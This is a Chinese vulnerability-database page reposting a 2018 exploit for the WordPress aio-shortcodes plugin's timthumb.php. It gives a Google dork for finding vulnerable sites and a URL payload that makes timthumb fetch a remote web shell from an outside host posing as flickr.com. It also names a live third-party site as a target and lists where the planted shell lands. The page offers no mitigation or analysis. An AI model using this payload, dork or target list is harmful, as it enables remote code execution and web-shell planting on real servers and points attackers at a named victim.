WordPress aio-shortcodes Plugin - Remote Code Execution - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1369533 漏洞类型
发布时间 2018-10-26 更新时间 2018-10-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018100225
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: WordPress aio-shortcodes Plugin - Remote Code Execution
# Google Dork: Index of /wp-content/plugins/aio-shortcodes
# Exploit: timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
# Date: 26 Oktober 2018
# Author: L4663r666h05t
# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
# Version: 1.x.x
# Screenshot: http://prntscr.com/lahts7
# Tested on: Windows 10 Pro (x64)

Versions Affected: 1.x.x

Live Site:
http://www.qvgop.org/wp-content/plugins/aio-shortcodes/timthumb.php
http://www.qvgop.org/wp-content/plugins/aio-shortcodes/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php

Your Shell:
http://localhost/wp-content/plugins/aio-shortcodes/cache/md5.php
http://localhost/wp-content/plugins/aio-shortcodes/cache/shell.php

Thanks to: T1KUS90T - ManadoGhost - Panjul Dot ID - Berandal - OWLSQUAD